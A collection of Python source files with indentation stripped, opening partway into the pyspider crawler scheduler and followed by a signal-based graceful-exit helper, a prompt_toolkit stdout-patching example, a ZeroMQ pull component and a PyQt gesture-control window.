for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
# load task queue when project is running and delete task_queue when project is stoped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
or project in not in task_queue
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
out queue may have size limit to prevent block, a send_buffer is used
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
# use force=False here to prevent automatic send_buffer append and get exception
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
# only check project pause when select new tasks, cronjob and new request still working
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# check send_buffer here. when not empty, out_queue may blocked. Not sending tasks
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
'''comsume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is in processing, the modify may conflict with the running task.
# postpone the modify after task finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
update_start = time.time()
self.update_task(task)
update_end = time.time();
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s update task cast:' + str(update_end-update_start)+"s", task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject informations about project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
overwirted send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
|
exit.py
|
"""
Exit the program gracefully when certain signals arrive.
"""
import threading
import signal
import sys
from threading import Thread,Semaphore
import collections
this = sys.modules[__name__]
this.lock = threading.Lock()
this.exit_worker = None
this.exit_barrier = None
this.exit_list = []
this.finish_barrier = None
def __graceful_exit_worker():
"""
Wait for the exit lock to become available, then call all of the
exit calls.
"""
#print "GEW START"
assert this.exit_barrier is not None
# Wait for the handler to tell us we're exting
this.exit_barrier.wait()
#print "GEW PAST BARRIER"
with this.lock:
#print "GEW DOING EXIT WORK"
for call in this.exit_list:
#print "GEW calling", call
call()
# Let on_graceful_exit know it can exit
this.finish_barrier.wait()
#print "GEW DONE"
def on_graceful_exit(call):
"""
Add an item to the list of calls to be made during a graceful
exit. If the exit worker isn't running, start it.
"""
#print "OGE", call
if not isinstance(call, collections.Callable):
raise ValueError("%s is not callable", call)
with this.lock:
if this.exit_worker is None and this.exit_barrier is None:
#print "OGE INITIALIZING"
this.finish_barrier = threading.Barrier(2)
this.exit_barrier = threading.Barrier(2)
this.exit_worker = threading.Thread(
target=lambda: __graceful_exit_worker())
this.exit_worker.setDaemon(True)
this.exit_worker.start()
#print "OGE APPENDING", call
this.exit_list.append(call)
#print "OGE DONE"
def __exit_handler(signum, frame):
"""
Let the worker go. This doesn't do much of anything because it's
called from inside a signal handler.
"""
#print "EH START"
with this.lock:
exit_barrier = this.exit_barrier
if exit_barrier is not None:
# Meet up with the worker
this.exit_barrier.wait()
#print "EH FIRST BARRIER"
# Wait for the worker to be done
this.finish_barrier.wait()
#print "EH HANDLER FINISHED"
#print "EH DONE"
sys.exit(0)
def set_graceful_exit():
"""
Set up a graceful exit when certain signals arrive.
"""
for sig in [signal.SIGHUP,
signal.SIGINT,
signal.SIGQUIT,
signal.SIGTERM]:
signal.signal(sig, __exit_handler)
|
patch-stdout.py
|
#!/usr/bin/env python
"""
An example that demonstrates how `patch_stdout` works.
This makes sure that output from other threads doesn't disturb the rendering of
the prompt, but instead is printed nicely above the prompt.
"""
from __future__ import unicode_literals
import threading
import time
from prompt_toolkit2 import prompt
from prompt_toolkit2.patch_stdout import patch_stdout
def main():
# Print a counter every second in another thread.
running = True
def thread():
i = 0
while running:
i += 1
print('i=%i' % i)
time.sleep(1)
t = threading.Thread(target=thread)
t.daemon = True
t.start()
# Now read the input. The print statements of the other thread
# should not disturb anything.
with patch_stdout():
result = prompt('Say something: ')
print('You said: %s' % result)
# Stop thread.
running = False
if __name__ == '__main__':
main()
|
pull.py
|
import contextlib
from threading import Thread
import zmq
from osgar.bus import BusShutdownException
import osgar.lib.serialize
class Pull:
def __init__(self, config, bus):
bus.register(*config['outputs'])
self.is_bind_set = config.get("bind", False)
self.endpoint = config.get('endpoint', 'tcp://127.0.0.1:5565')
self.timeout = config.get('timeout', 1) # default recv timeout 1s
self.thread = Thread(target=self.run)
self.thread.name = bus.name
self.bus = bus
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout=timeout)
def run(self):
context = zmq.Context.instance()
socket = context.socket(zmq.PULL)
# https://stackoverflow.com/questions/7538988/zeromq-how-to-prevent-infinite-wait
socket.RCVTIMEO = int(self.timeout * 1000) # convert to milliseconds
if self.is_bind_set:
socket.LINGER = 100
socket.bind(self.endpoint)
else:
socket.connect(self.endpoint)
with contextlib.closing(socket):
while self.bus.is_alive():
try:
channel, raw = socket.recv_multipart()
message = osgar.lib.serialize.deserialize(raw)
self.bus.publish(channel.decode('ascii'), message)
except zmq.error.Again:
pass
def request_stop(self):
self.bus.shutdown()
|
mock.py
|
import functools
from PyQt5 import QtCore
from PyQt5.QtWidgets import QMainWindow, QApplication, QAction, qApp
from PyQt5.QtCore import pyqtSlot
import global_style
from frames.frame1.frame1 import Frame1
from frames.frame2.frame2 import Frame2
from frames.frame3.frame3 import Frame3
from frames.frame4.frame4 import Frame4
from frames.main_view.main_view import MainView
from kinect import kinect
import threading
from queue import Queue, Empty
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("IAT control by gesture")
self.volumes = [125, 125, 125]
self.directions = [0, 0, 0]
exitAction = QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Anwendung schließen')
exitAction.triggered.connect(qApp.quit)
uebersichtView = QAction('&Übersicht', self)
uebersichtView.setShortcut('Ctrl+A')
uebersichtView.setStatusTip('Übersicht')
uebersichtView.triggered.connect(functools.partial(self.change_frame, 0))
umpumpenView = QAction('&Umpumpen', self)
umpumpenView.setShortcut('Ctrl+S')
umpumpenView.setStatusTip('Umpumpen')
umpumpenView.triggered.connect(functools.partial(self.change_frame, 1))
menubar = self.menuBar()
menu = menubar.addMenu('&Menu')
menu.addAction(exitAction)
menu.addAction(uebersichtView)
menu.addAction(umpumpenView)
self.widget = MainView(self)
self.widgets = [MainView, Frame1, Frame2, Frame3, Frame4]
self.setCentralWidget(self.widget)
self.hand_data = None
self.current_widget_number = 0
self.statusBar().showMessage(u"Übersicht", 10000)
def update(self):
try:
self.update_values()
except:
print("Couldn't get new values")
window.widget.set_slider_position(0, self.volumes[0])
window.widget.set_slider_position(1, self.volumes[1])
window.widget.set_slider_position(2, self.volumes[2])
def change_frame(self, widget_index, props=None):
self.widget = self.widgets[widget_index](self)
if props:
self.widget.props = props
print(props)
self.widget.propify()
if len(props) > 3:
self.directions[props[0]] = -1
self.directions[props[1]] = 1
if widget_index == 0:
self.directions = [0, 0, 0]
self.setCentralWidget(self.widget)
self.current_widget_number = widget_index
def update_values(self):
for i in range(0, 3):
if self.directions[i] > 0:
if self.volumes[i] < 250:
self.volumes[i] += self.directions[i]
else:
if self.volumes[i] > 0:
self.volumes[i] += self.directions[i]
